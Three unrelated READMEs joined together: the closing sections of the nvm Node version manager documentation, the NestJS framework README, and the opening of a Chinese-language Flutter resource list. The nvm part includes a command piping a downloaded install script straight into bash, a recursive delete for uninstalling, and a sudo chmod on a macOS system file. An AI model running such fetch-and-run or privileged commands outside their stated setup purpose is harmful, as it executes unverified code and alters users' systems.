# ~/.config/fish/functions/nvm_find_nvmrc.fish
function nvm_find_nvmrc
bass source ~/.nvm/nvm.sh --no-use ';' nvm_find_nvmrc
end
# ~/.config/fish/functions/load_nvm.fish
function load_nvm --on-variable="PWD"
set -l default_node_version (nvm version default)
set -l node_version (nvm version)
set -l nvmrc_path (nvm_find_nvmrc)
if test -n "$nvmrc_path"
set -l nvmrc_node_version (nvm version (cat $nvmrc_path))
if test "$nvmrc_node_version" = "N/A"
nvm install (cat $nvmrc_path)
else if test nvmrc_node_version != node_version
nvm use $nvmrc_node_version
end
else if test "$node_version" != "$default_node_version"
echo "Reverting to default Node version"
nvm use default
end
end
# ~/.config/fish/config.fish
# You must call it on initialization or listening to directory switching won't work
load_nvm
```
## License
nvm is released under the MIT license.
Copyright (C) 2010 Tim Caswell and Jordan Harband
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
## Running Tests
Tests are written in [Urchin]. Install Urchin (and other dependencies) like so:
npm install
There are slow tests and fast tests. The slow tests do things like install node
and check that the right versions are used. The fast tests fake this to test
things like aliases and uninstalling. From the root of the nvm git repository,
run the fast tests like this:
npm run test/fast
Run the slow tests like this:
npm run test/slow
Run all of the tests like this:
npm test
Nota bene: Avoid running nvm while the tests are running.
## Environment variables
nvm exposes the following environment variables:
- `NVM_DIR` - nvm's installation directory.
- `NVM_BIN` - where node, npm, and global packages for the active version of node are installed.
- `NVM_INC` - node's include file directory (useful for building C/C++ addons for node).
- `NVM_CD_FLAGS` - used to maintain compatibility with zsh.
- `NVM_RC_VERSION` - version from .nvmrc file if being used.
Additionally, nvm modifies `PATH`, and, if present, `MANPATH` and `NODE_PATH` when changing versions.
## Bash Completion
To activate, you need to source `bash_completion`:
```sh
[[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion
```
Put the above sourcing line just below the sourcing line for nvm in your profile (`.bashrc`, `.bash_profile`).
### Usage
nvm:
> $ nvm <kbd>Tab</kbd>
```
alias deactivate install list-remote reinstall-packages uninstall version
cache exec install-latest-npm ls run unload version-remote
current help list ls-remote unalias use which
```
nvm alias:
> $ nvm alias <kbd>Tab</kbd>
```
default iojs lts/* lts/argon lts/boron lts/carbon lts/dubnium lts/erbium node stable unstable
```
> $ nvm alias my_alias <kbd>Tab</kbd>
```
v10.22.0 v12.18.3 v14.8.0
```
nvm use:
> $ nvm use <kbd>Tab</kbd>
```
my_alias default v10.22.0 v12.18.3 v14.8.0
```
nvm uninstall:
> $ nvm uninstall <kbd>Tab</kbd>
```
my_alias default v10.22.0 v12.18.3 v14.8.0
```
## Compatibility Issues
`nvm` will encounter some issues if you have some non-default settings set. (see [#606](/../../issues/606))
The following are known to cause issues:
Inside `~/.npmrc`:
```sh
prefix='some/path'
```
Environment Variables:
```sh
$NPM_CONFIG_PREFIX
$PREFIX
```
Shell settings:
```sh
set -e
```
## Installing nvm on Alpine Linux
In order to provide the best performance (and other optimisations), nvm will download and install pre-compiled binaries for Node (and npm) when you run `nvm install X`. The Node project compiles, tests and hosts/provides these pre-compiled binaries which are built for mainstream/traditional Linux distributions (such as Debian, Ubuntu, CentOS, RedHat et al).
Alpine Linux, unlike mainstream/traditional Linux distributions, is based on [BusyBox](https://www.busybox.net/), a very compact (~5MB) Linux distribution. BusyBox (and thus Alpine Linux) uses a different C/C++ stack to most mainstream/traditional Linux distributions - [musl](https://www.musl-libc.org/). This makes binary programs built for such mainstream/traditional incompatible with Alpine Linux, thus we cannot simply `nvm install X` on Alpine Linux and expect the downloaded binary to run correctly - you'll likely see "...does not exist" errors if you try that.
There is a `-s` flag for `nvm install` which requests nvm download Node source and compile it locally.
If installing nvm on Alpine Linux *is* still what you want or need to do, you should be able to achieve this by running the following from you Alpine Linux shell:
```sh
apk add -U curl bash ca-certificates openssl ncurses coreutils python2 make gcc g++ libgcc linux-headers grep util-linux binutils findutils
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.2/install.sh | bash
```
The Node project has some desire but no concrete plans (due to the overheads of building, testing and support) to offer Alpine-compatible binaries.
As a potential alternative, @mhart (a Node contributor) has some [Docker images for Alpine Linux with Node and optionally, npm, pre-installed](https://github.com/mhart/alpine-node).
<a id="removal"></a>
## Uninstalling / Removal
### Manual Uninstall
To remove `nvm` manually, execute the following:
```sh
$ rm -rf "$NVM_DIR"
```
Edit `~/.bashrc` (or other shell resource config) and remove the lines below:
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion
```
## Docker For Development Environment
To make the development and testing work easier, we have a Dockerfile for development usage, which is based on Ubuntu 14.04 base image, prepared with essential and useful tools for `nvm` development, to build the docker image of the environment, run the docker command at the root of `nvm` repository:
```sh
$ docker build -t nvm-dev .
```
This will package your current nvm repository with our pre-defined development environment into a docker image named `nvm-dev`, once it's built with success, validate your image via `docker images`:
```sh
$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
nvm-dev latest 9ca4c57a97d8 7 days ago 650 MB
```
If you got no error message, now you can easily involve in:
```sh
$ docker run -h nvm-dev -it nvm-dev
nvm@nvm-dev:~/.nvm$
```
Please note that it'll take about 8 minutes to build the image and the image size would be about 650MB, so it's not suitable for production usage.
For more information and documentation about docker, please refer to its official website:
- https://www.docker.com/
- https://docs.docker.com/
## Problems
- If you try to install a node version and the installation fails, be sure to run `nvm cache clear` to delete cached node downloads, or you might get an error like the following:
curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume.
- Where's my `sudo node`? Check out [#43](https://github.com/nvm-sh/nvm/issues/43)
- After the v0.8.6 release of node, nvm tries to install from binary packages. But in some systems, the official binary packages don't work due to incompatibility of shared libs. In such cases, use `-s` option to force install from source:
```sh
nvm install -s 0.8.6
```
- If setting the `default` alias does not establish the node version in new shells (i.e. `nvm current` yields `system`), ensure that the system's node `PATH` is set before the `nvm.sh` source line in your shell profile (see [#658](https://github.com/nvm-sh/nvm/issues/658))
## macOS Troubleshooting
**nvm node version not found in vim shell**
If you set node version to a version other than your system node version `nvm use 6.2.1` and open vim and run `:!node -v` you should see `v6.2.1` if you see your system version `v0.12.7`. You need to run:
```shell
sudo chmod ugo-x /usr/libexec/path_helper
```
More on this issue in [dotphiles/dotzsh](https://github.com/dotphiles/dotzsh#mac-os-x).
**nvm is not compatible with the npm config "prefix" option**
Some solutions for this issue can be found [here](https://github.com/nvm-sh/nvm/issues/1245)
There is one more edge case causing this issue, and that's a **mismatch between the `$HOME` path and the user's home directory's actual name**.
You have to make sure that the user directory name in `$HOME` and the user directory name you'd see from running `ls /Users/` **are capitalized the same way** ([See this issue](https://github.com/nvm-sh/nvm/issues/2261)).
To change the user directory and/or account name follow the instructions [here](https://support.apple.com/en-us/HT201548)
[1]: https://github.com/nvm-sh/nvm.git
[2]: https://github.com/nvm-sh/nvm/blob/v0.37.2/install.sh
[3]: https://travis-ci.org/nvm-sh/nvm
[4]: https://github.com/nvm-sh/nvm/releases/tag/v0.37.2
[Urchin]: https://github.com/scraperwiki/urchin
[Fish]: http://fishshell.com
**Homebrew makes zsh directories unsecure**
```shell
zsh compinit: insecure directories, run compaudit for list.
Ignore insecure directories and continue [y] or abort compinit [n]? y
```
Homebrew causes insecure directories like `/usr/local/share/zsh/site-functions` and `/usr/local/share/zsh`. This is **not** an `nvm` problem - it is a homebrew problem. Refer [here](https://github.com/zsh-users/zsh-completions/issues/680) for some solutions related to the issue.
**Macs with M1 chip**
_January 2021:_ there are no pre-compiled NodeJS binaries for versions prior to 15.x for Apple's new M1 chip (arm64 architecture).
Some issues you may encounter:
- using `nvm` to install, say, `v14.15.4`:
- the C code compiles successfully
- but crashes with an out of memory error when used
- increasing the memory available to node still produces the out of memory errors:
```sh
$ NODE_OPTIONS="--max-old-space-size=4096" ./node_modules/.bin/your_node_package
```
- when using `nvm` to install some versions, the compilation fails
One solution to this issue is to change the architecture of your shell from arm64 to x86.
Let's assume that:
- you already have versions `12.20.1` and `14.15.4` installed using `nvm`
- the current version in use is `14.15.4`
- you are using the `zsh` shell
```sh
# Check what version you're running:
$ node --version
v14.15.4
# Check architecture of the `node` binary:
$ node -p process.arch
arm64
# This confirms that the arch is for the M1 chip, which is causing the problems.
# So we need to uninstall it.
# We can't uninstall the version we are currently using, so switch to another version:
$ nvm install v12.20.1
# Now uninstall the version we want to replace:
$ nvm uninstall v14.15.4
# Set the architecture for our shell to 64-bit X86:
$ arch -x86_64 zsh
# Install node using nvm. This should download the precompiled x64 binary:
$ nvm install v14.15.4
# Now check that the architecture is correct:
$ node -p process.arch
x64
# It is now safe to revert zsh back to the native architecture:
$ arch -arm64 zsh
```
|
<p align="center">
<a href="http://nestjs.com/" target="blank"><img src="https://nestjs.com/img/logo-small.svg" width="120" alt="Nest Logo" /></a>
</p>
[circleci-image]: https://img.shields.io/circleci/build/github/nestjs/nest/master?token=abc123def456
[circleci-url]: https://circleci.com/gh/nestjs/nest
<p align="center">A progressive <a href="http://nodejs.org" target="_blank">Node.js</a> framework for building efficient and scalable server-side applications.</p>
<p align="center">
<a href="https://www.npmjs.com/~nestjscore" target="_blank"><img src="https://img.shields.io/npm/v/@nestjs/core.svg" alt="NPM Version" /></a>
<a href="https://www.npmjs.com/~nestjscore" target="_blank"><img src="https://img.shields.io/npm/l/@nestjs/core.svg" alt="Package License" /></a>
<a href="https://www.npmjs.com/~nestjscore" target="_blank"><img src="https://img.shields.io/npm/dm/@nestjs/core.svg" alt="NPM Downloads" /></a>
<a href="https://circleci.com/gh/nestjs/nest" target="_blank"><img src="https://img.shields.io/circleci/build/github/nestjs/nest/master" alt="CircleCI" /></a>
<a href="https://coveralls.io/github/nestjs/nest?branch=master" target="_blank"><img src="https://coveralls.io/repos/github/nestjs/nest/badge.svg?branch=master#9" alt="Coverage" /></a>
<a href="https://discord.gg/G7Qnnhy" target="_blank"><img src="https://img.shields.io/badge/discord-online-brightgreen.svg" alt="Discord"/></a>
<a href="https://opencollective.com/nest#backer" target="_blank"><img src="https://opencollective.com/nest/backers/badge.svg" alt="Backers on Open Collective" /></a>
<a href="https://opencollective.com/nest#sponsor" target="_blank"><img src="https://opencollective.com/nest/sponsors/badge.svg" alt="Sponsors on Open Collective" /></a>
<a href="https://paypal.me/kamilmysliwiec" target="_blank"><img src="https://img.shields.io/badge/Donate-PayPal-ff3f59.svg"/></a>
<a href="https://opencollective.com/nest#sponsor" target="_blank"><img src="https://img.shields.io/badge/Support%20us-Open%20Collective-41B883.svg" alt="Support us"></a>
<a href="https://twitter.com/nestframework" target="_blank"><img src="https://img.shields.io/twitter/follow/nestframework.svg?style=social&label=Follow"></a>
</p>
<!--[![Backers on Open Collective](https://opencollective.com/nest/backers/badge.svg)](https://opencollective.com/nest#backer)
[![Sponsors on Open Collective](https://opencollective.com/nest/sponsors/badge.svg)](https://opencollective.com/nest#sponsor)-->
## Description
Nest is a framework for building efficient, scalable <a href="http://nodejs.org" target="_blank">Node.js</a> server-side applications. It uses modern JavaScript, is built with <a href="http://www.typescriptlang.org" target="_blank">TypeScript</a> (preserves compatibility with pure JavaScript) and combines elements of OOP (Object Oriented Programming), FP (Functional Programming), and FRP (Functional Reactive Programming).
<p>Under the hood, Nest makes use of <a href="https://expressjs.com/" target="_blank">Express</a>, but also, provides compatibility with a wide range of other libraries, like e.g. <a href="https://github.com/fastify/fastify" target="_blank">Fastify</a>, allowing for easy use of the myriad third-party plugins which are available.</p>
## Philosophy
<p>In recent years, thanks to Node.js, JavaScript has become the “lingua franca” of the web for both front and backend applications, giving rise to awesome projects like <a href="https://angular.io/" target="_blank">Angular</a>, <a href="https://github.com/facebook/react" target="_blank">React</a> and <a href="https://github.com/vuejs/vue" target="_blank">Vue</a> which improve developer productivity and enable the construction of fast, testable, extensible frontend applications. However, on the server-side, while there are a lot of superb libraries, helpers and tools for Node, none of them effectively solve the main problem - the architecture.</p>
<p>Nest aims to provide an application architecture out of the box which allows for effortless creation of highly testable, scalable, loosely coupled and easily maintainable applications.</p>
## Getting started
* To check out the [guide](https://docs.nestjs.com), visit [docs.nestjs.com](https://docs.nestjs.com). :books:
* 要查看中文 [指南](readme_zh.md), 请访问 [docs.nestjs.cn](https://docs.nestjs.cn). :books:
## Consulting
With official support, you can get expert help straight from Nest core team. We provide dedicated technical support, migration strategies, advice on best practices (and design decisions), PR reviews, and team augmentation. Read more about [support here](https://enterprise.nestjs.com).
## Support
Nest is an MIT-licensed open source project. It can grow thanks to the sponsors and support by the amazing backers. If you'd like to join them, please [read more here](https://docs.nestjs.com/support).
#### Principal Sponsor
<a href="https://valor-software.com/" target="_blank"><img src="https://docs.nestjs.com/assets/sponsors/valor-software.png" width="320" /></a>
#### Silver Sponsors
<a href="https://neoteric.eu/" target="_blank"><img src="https://nestjs.com/img/neoteric-cut.png" width="120" valign="middle" /></a>
<a href="http://gojob.com" target="_blank"><img src="http://nestjs.com/img/gojob-logo.png" valign="middle" height="95" /></a>
<a href="https://trilon.io" target="_blank"><img src="https://nestjs.com/img/trilon.svg" width="150" valign="middle" /></a>
<a href="http://www.leogistics.com" target="_blank"><img src="https://nestjs.com/img/leogistics-logo.jpeg" width="150" valign="middle" /></a>
#### Sponsors
<a href="https://www.swingdev.io" target="_blank"><img src="https://nestjs.com/img/swingdev-logo.svg#1" width="110" valign="middle" /> </a> <a href="https://blueanchor.io/" target="_blank"><img src="https://nestjs.com/img/blueanchor.png" width="150" valign="middle" /></a>
<a href="https://www.novologic.com/" target="_blank"><img src="https://nestjs.com/img/novologic.png" width="110" valign="middle" /></a> <a href="https://hostpresto.com" target="_blank"><img src="https://nestjs.com/img/hostpresto.png" height="24" valign="middle" /></a>
<a href="https://ever.co/" target="_blank"><img src="https://nestjs.com/img/ever-logo.png" height="14" valign="middle" /></a>
<a href="https://buddy.works/" target="_blank"><img src="https://nestjs.com/img/buddy-logo.svg" height="25" valign="middle" /></a>
<a href="https://blokt.com" target="_blank"><img src="https://nestjs.com/img/blokt-logo.png" height="25" valign="middle" /></a> <a href="https://genuinebee.com/" target="_blank"><img src="https://nestjs.com/img/genuinebee.svg" height="27" valign="middle" /></a> <a href="http://architectnow.net/" target="_blank"><img src="https://nestjs.com/img/architectnow.png" height="20" valign="middle" /></a> <a href="https://quander.io/" target="_blank"><img src="https://nestjs.com/img/quander.png" height="22" valign="middle" /></a> <a href="https://mantro.net/" target="_blank"><img src="https://nestjs.com/img/mantro-logo.svg" height="19" valign="middle" /></a> <a href="https://triplebyte.com/" target="_blank"><img src="https://nestjs.com/img/triplebyte.png" height="20" valign="middle" /></a>
<a href="https://reposit.co.uk/" target="_blank"><img src="https://nestjs.com/img/reposit-logo.png" height="18" valign="middle" /></a>
<a href="https://nearpod.com/" target="_blank"><img src="https://nestjs.com/img/nearpod-logo.svg" width="100" valign="middle" /></a>
<a href="https://clay.global/" target="_blank"><img src="https://nestjs.com/img/clay-logo.svg" width="75" valign="middle" /></a>
<a href="https://firesticktricks.com" target="_blank"><img src="https://nestjs.com/img/firesticktricks-logo.png" width="120" valign="middle" /></a>
<a href="https://www.codeguesser.co.uk" target="_blank"><img src="https://nestjs.com/img/codeguesser-logo.svg" width="120" valign="middle" /></a>
<a href="https://tekhattan.com" target="_blank"><img src="https://nestjs.com/img/tekhattan-logo.png" width="110" valign="middle" /></a>
<a href="https://f-a.nz/" target="_blank"><img src="https://nestjs.com/img/franz.svg" width="80" valign="middle" /></a>
<a href="https://sparkfabrik.com/" target="_blank"><img src="https://nestjs.com/img/sparkfabrik-logo.png" width="120" valign="middle" /></a>
## Backers
<a href="https://opencollective.com/nest" target="_blank"><img src="https://opencollective.com/nest/backers.svg?width=1000"></a>
## Stay in touch
* Author - [Kamil Myśliwiec](https://kamilmysliwiec.com)
* Website - [https://nestjs.com](https://nestjs.com/)
* Twitter - [@nestframework](https://twitter.com/nestframework)
## License
Nest is [MIT licensed](LICENSE).
|
[<img src="https://user-images.githubusercontent.com/1295961/45949308-cbb2f680-bffb-11e8-8054-28c35ed6d132.png" align="center" width="850">](https://flutter.dev/)
<p align="center">
<a href="https://stackoverflow.com/questions/tagged/flutter?sort=votes">
<img alt="StackOverflow" src="https://img.shields.io/badge/StackOverflow-16,410-orange.svg" />
</a>
<a href="https://github.com/search?q=flutter+language%3Adart&type=Repositories">
<img alt="Github Repositories" src="https://img.shields.io/badge/Repos-139304-brightgreen.svg" />
</a>
<img alt="Entries" src="https://img.shields.io/badge/Items-358-lightgrey.svg" />
<a href="https://github.com/sindresorhus/awesome">
<img alt="Awesome" src="https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg" />
</a>
<a href="https://saythanks.io/to/Solido" target="_blank">
<img alt="Thanks" src="https://img.shields.io/badge/Say%20Thanks-!-1EAEDB.svg" />
</a>
</p>
<a href="https://flutter.dev/">Flutter</a>是Google出品的一款用于开发高性能、高保真、跨平台App(Android iOS)的SDK。
如果您欣赏本篇内容📖,支持项目可见性,请给👍|⭐|👏
**欢迎加入:**
>Flutter中国开发者,1群:`860708630`(已满)2群:`187818932`,
<img src="http://www.devio.org/img/other/flutter-china-develope-qrcode-0.jpg" height="370"/>
<div style="text-align: center"><table><tr>
<td style="text-align: center">
<a href="https://twitter.com/BlueAquilae/status/1049315328835182592">
<img src="https://i.imgur.com/1Xdsp92.gif" width="200"/></a>
</td>
<td style="text-align: center">
<img src="https://github.com/flschweiger/reply/blob/master/gif/reply.gif" width="400"/>
</td>
<td style="text-align: center">
<img src="https://camo.githubusercontent.com/23d3c78b0a2b645567630468bd68d54c02c2076a/68747470733a2f2f63646e2e3264696d656e73696f6e732e636f6d2f315f53746172742e676966" width="200"/>
</td>
</tr></table></div>
>[⭐整合ChatGPT与Flutter高级技术,手把手带你从0到1开发一款可运行在多端的聊天机器人App,帮助你抓住机遇,快速具备AI运用能力,成为移动端领域的AI高手👏](https://u.cboy.me/ss/u?cid=672&aid=5&platform=github)
## 目录
- [文章](#文章)
- [视频](#视频)
- [组件](#组件)
- [导航](#导航)
- [模板](#模板)
- [插件](#插件)
- [框架](#框架)
- [实验性](#实验性)
- [游戏](#游戏)
- [开源App](#开源app)
- [实用工具](#实用工具)
- [社区](#社区)
- [书籍](#书籍)
- [福利](#福利)
## 文章
### 介绍
- [Google IO 2018](https://medium.com/flutter-io/building-beautiful-flexible-user-interfaces-with-flutter-material-theming-and-official-material-13ae9279ef19) [1.1K👏] - 构建美观,灵活的用户界面。
- [Presentation](https://speakerdeck.com/hjjunior/why-i-chose-flutter) - 为什么我会选择Flutter 由[Helio S. Junior](https://github.com/hjJunior)提供。
- [Flutter Web](https://medium.com/flutter-community/ins-and-outs-of-flutter-web-7a82721dc19a) - Flutter Web的来龙去脉 by [Nash](https://nash0x7e2.github.io/)提供.
### 网站/博客
* [Flutter技术专栏](http://www.devio.org/tags/#Flutter)![ new](http://www.devio.org/img/ico/ico_new.gif)
- [Welcome to Flutter](https://didierboelens.com) - 英文和法文博客,致力于为Ditter Boelens提出的有关Flutter的最常见问题提供实用的解决方案。
- [SZAŁKO-BLOG](https://marcinszalek.pl/) - 渐进式高级设计,由[Marcin Szalek](https://marcinszalek.pl/)提供。
- [Flutter by Example](https://flutterbyexample.com/) - 基于Redux,Firebase,自定义动画和UI的教程。
- [Flutter Institute](https://flutter.institute/) - 非常原创的内容和教程,由 [Brian Armstrong](https://twitter.com/flutterinst)提供。
- [Iirokrankka.com](https://iirokrankka.com/) - 关于Flutter,Dart和任何相关的文章和教程,由[Iiro Krankka](https://twitter.com/koorankka)提供。
- [Norbert](https://medium.com/@norbertkozsir) - 深度文章、特色与应用创建,由 [Norbert515](https://github.com/Norbert515)提供。
- [Flutter Tips](https://medium.com/@diegoveloper) - 开发中的文章,提示和技巧 由[Diego Velásquez](https://twitter.com/diegoveloper)提供。
- [FilledStacks](https://www.filledstacks.com/) - 开发教程和指南 by [Dane Mackier](https://www.instagram.com/filledstacks/)提供。
- [Awesome Flutter tips](https://github.com/erluxman/awesomefluttertips/) - 由 [erluxman](https://twitter.com/erluxman/) 提供的帮助开发人员提高生产力的提示。
### 教程
* [ChatGPT + Flutter快速开发多端聊天机器人App](https://u.cboy.me/ss/u?cid=672&aid=5&platform=devio) - 整合ChatGPT与Flutter高级技术,手把手带你从0到1开发一款可运行在多端的聊天机器人App,帮助你抓住机遇,快速具备AI运用能力,成为移动端领域的AI高手![new](http://www.devio.org/img/ico/ico_new.gif)。
* [Flutter高级进阶实战 仿哔哩哔哩APP](https://api.devio.org/ss/u?cid=487&aid=3&platform=github) - 一次性深度掌握Flutter高阶技能+商业级复杂项目架构设计与开发方案
* [Flutter从入门到进阶](https://api.devio.org/ss/u?cid=321&aid=3&platform=github) - 解锁Flutter开发新姿势,一网打尽Flutter核心技术。
* [Flutter 3.7更新详解](https://www.imooc.com/article/334835) - 全局文本选择、Impeller 渲染速度、DevTools,为开发者们带来一个更好用的 Flutter 3.7!
* [Flutter 3.3更新详解](https://www.devio.org/2022/11/06/whats-new-in-flutter-3-3/) - 文字处理、性能提升和其他改进和更新,为开发者们带来一个更好用的 Flutter 3.3!
* [Flutter 3更新详解](https://www.imooc.com/article/325757) - 深入了解最新版本,包括 macOS 和 Linux 平台的稳定支持、多项性能改进等!
* [一文掌握Flutter 2.10新特性](https://www.imooc.com/article/323459) - Flutter 2.10 包括 Flutter 对 Windows ⽀持的重⼤更新、⼏项重⼤的性能改进、框架中图标和颜⾊的新⽀持以及一些⼯具改进等。
* [Flutter for Windows桌面端稳定版发布](https://www.imooc.com/article/324225) - 它使 Windows 开发者也能享受到移动开发的相同生产力和功能。
* [Flutter 2.8 更新特性一览](https://www.imooc.com/article/324225) - Flutter 2.8正式版重磅发布,还不来看看?
* [Flutter2重磅发布支持Web和桌面应用](https://www.imooc.com/article/315453) - Flutter正式迎来了它的的第二个大版本,增加了对桌面和Web 应用程序的支持。
* [革命性移动端开发框架-Flutter时间简史](http://www.imooc.com/article/281683) - 一文读懂Flutter前世今生。
- [Animated Chat](https://codelabs.developers.google.com/codelabs/flutter/#0) - 通过Google Code Labs构建漂亮的用户界面。
- [Firebase Chat](https://codelabs.developers.google.com/codelabs/flutter-firebase/#0) - Google Code Labs整合Firebase。
- [Planets-Flutter: from design to app](http://sergiandreplace.com/2017/09/planets-flutter-from-design-to-app) - 详细的planets设计教程。
- [Todo List](https://github.com/lesnitsky/todolist_flutter) [196⭐] – 一步步带你如何使用Flutter构建待办事项列表,由[Andrei Lesnitsky](https://twitter.com/lesnitsky_a)提供。
- [Flutter and Dart development](https://suragch.medium.com/flutter-and-dart-development-articles-981be9ef7b23) - [Suragch](https://twitter.com/Suragch1)撰写的文章和教程。
### 初学者
- [给Android开发者的Flutter入门指南](https://www.imooc.com/article/315337) - 一份面向Android开发者的Flutter入门指南。
- [初学者如何高效学习Flutter开发?](https://www.imooc.com/article/312207) - 一份指导初学者快速高效上手Flutter的指南。
- [Flutter开发路线图](https://github.com/olexale/flutter_roadmap) [2795⭐] - 由[Olexandr Leuschenko](https://github.com/olexale)制作的Flutter新手可视化路线图,包含原则、模式和框架。
- [布局速查表](https://medium.com/flutter-community/flutter-layout-cheat-sheet-5363348d037e) - [Tomek Polański](https://github.com/tomaszpolanski)提供的布局小部件的详细示例。
- [入门Flutter](https://www.raywenderlich.com/24499516-getting-started-with-flutter) - 来自[raywenderlich.com](https://www.raywenderlich.com)的指南。
- [初学者指南](https://github.com/antz22/ultimate-guide-to-flutter) [123⭐] - [Anthony](https://github.com/antz22)编写的关于Flutter和Firebase基础知识的综合指南。
### 中级
- [Flutter极简状态管理](https://suragch.medium.com/flutter-state-management-for-minimalists-4c71a2f2f0c1?sk=6f9cedfb550ca9cc7f88317e2e7055a0) - 通过了解应用程序架构,无需依赖第三方框架。作者:[Suragch](https://twitter.com/Suragch1)。另请参阅[状态管理](#state-management)。
### 高级
- [渲染流水线](https://www.youtube.com/watch?v=UUfXWzp0-DU) [799👍] 和 [让我们构建渲染树](https://www.youtube.com/watch?v=VsYbFnucHsU) - 由Adam Barth介绍的引擎架构。
- [渲染对象](https://medium.com/flutter-community/flutter-what-are-widgets-renderobjects-and-elements-630a57d05208) - 什么是Widgets、渲染对象和元素?作者:[Norbert515](https://github.com/Norbert515)。
- [流和RxDart](https://skillsmatter.com/skillscasts/12254-flutter-with-streams-and-rxdart) - 由[Brian Egan](https://github.com/brianegan)在Skillmatters上的演讲。
- [手势系统](https://medium.com/flutter-community/flutter-deep-dive-gestures-c16203b3434f) - Flutter深入剖析:手势。作者:[Nash](https://github.com/nash0x7e2)。
- [模式](https://www.didierboelens.com/2018/06/widget---state---context---inheritedwidget/) - 由[Didier Boelens](https://didierboelens.com)解释的Widget、状态、上下文和InheritedWidget。
- [渲染引擎教程](https://medium.com/saugo360/flutters-rendering-engine-a-tutorial-part-1-e9eff68b825d) - Flutter的渲染引擎教程。作者:[AbdulRahman AlHamali](https://github.com/AbdulRahmanAlHamali/)。
- [InheritedWidget](https://medium.com/@chemamolins/is-flutters-inheritedwidget-a-good-fit-to-hold-app-state-2ec5b33d023e) - 使用Flutter的InheritedWidget来保存应用状态。作者:[Chema Molins](https://github.com/jmolins)。
- [从移动到桌面](https://medium.com/flutter-community/flutter-from-mobile-to-desktop-93635e8de64e) - 构建适用于智能手机和桌面的应用程序。作者:[Marcelo Henrique Neppel](https://neppel.com.br)。
- [辅助功能小部件](https://medium.com/flutter-community/a-deep-dive-into-flutters-accessibility-widgets-eb0ef9455bc) - 关于辅助功能的各个方面的深入信息。作者:[Muhammed Salih Güler](https://twitter.com/salihgueler)。
- [使用时间线进行性能分析](https://medium.com/flutter-io/profiling-flutter-applications-using-the-timeline-a1a434964af3) - 使用时间线可以找出和解决应用程序中特定的性能问题。作者:[Chinmay Garde](https://medium.com/@chinmaygarde)。
### HOWTO文档
- [视差效果](https://marcinszalek.pl/flutter/tickets-challenge-parallax) - [Marcin Szalek](https://marcinszalek.pl)创建的视差和非线性动画。
- [构建变体](https://medium.com/@salvatoregiordanoo/flavoring-flutter-392aaa875f36) - [Salvatore Giordano](https://medium.com/@salvatoregiordanoo)介绍了如何定义构建配置并在Flutter中进行切换。
- [构建变体](https://medium.com/@angeloavv/easily-build-flavors-in-flutter-android-and-ios-with-flutter-flavorizr-d48cbf956e4) - [Angelo Cassano](https://medium.com/@angeloavv)使用flutter_flavorizr轻松在Flutter(Android和iOS)中构建变体。
## 视频
* [ChatGPT + Flutter快速开发多端聊天机器人App](https://u.cboy.me/ss/u?cid=672&aid=5&platform=devio) - 整合ChatGPT与Flutter高级技术,手把手带你从0到1开发一款可运行在多端的聊天机器人App,帮助你抓住机遇,快速具备AI运用能力,成为移动端领域的AI高手![new](http://www.devio.org/img/ico/ico_new.gif)。
* [Flutter从入门到进阶实战携程网App](https://api.devio.org/ss/u?cid=321&aid=3&platform=github) - 一门涵盖入门 -> 进阶 -> 实战 -> 拔高拓展的视频教程。
- [Boring Show](https://www.youtube.com/watch?v=CPmN4-i9zC8&list=PLOU2XLYxmsIK0r_D-zWcmJ1plIcDNnRkK) - 与Flutter团队一起探索的视频系列。
- [Tensor Programming](https://www.youtube.com/watch?v=WwhyaqNtNQY&list=PLJbE2Yu2zumDqr_-hqpAN0nIr6m14TAsd) [86🎬] - [Tensor Programming](http://tensor-programming.com/)提供的内容非常丰富。
- [Mtechviral](https://www.youtube.com/watch?v=qWL1lGchpRA&list=PLR2qQy0Zxs_UdqAcaipPR3CG1Ly57UlhV) [245🎬] - [印地语/英语] [Pawan Kumar](https://github.com/iampawan)的Mtechviral系列视频。
- [Flutter in Practice](https://www.youtube.com/playlist?list=PLhXZp00uXBk5TSY6YOdmpzp1yG3QbFvrN) - 面向初学者和非程序员的视频课程,由[Zaiste](https://zaiste.net/)提供。
- [Whatsupcoders](https://www.youtube.com/c/whatsupcoders) [82🎬] - 由[Kamal](https://github.com/whatsupcoders)提供的关于Flutter小部件的免费视频系列。
- [Reso Coder](https://www.youtube.com/channel/UCSIvrn68cUk8CS8MbtBmBkA) - [Matej Rešetár](https://github.com/ResoCoder)提供的中级和高级视频。
## 组件
### 演示
- [官方展示库](https://github.com/flutter/gallery) - Flutter团队提供的材料设计小部件演示。
- [Flutter示例](https://github.com/nisrulz/flutter-examples) [5861⭐] - [Nishant Srivastava](https://github.com/nisrulz)编写的简单基础的独立应用程序示例。
- [Flutter目录](https://github.com/X-Wei/flutter_catalog) [1601⭐] - [X-Wei](https://github.com/X-Wei)展示Flutter组件,同时显示源代码。
- [生成艺术](https://github.com/Solido/flutter-d-art) [401⭐] - [Robert Felker](https://github.com/Solido)创建的生成艺术作品。
### UI
- [StaggeredGridView](https://github.com/letsar/flutter_staggered_grid_view) [2292⭐] - 可变大小瓦片的网格视图,由[Romain Rastel](https://github.com/letsar)创建。
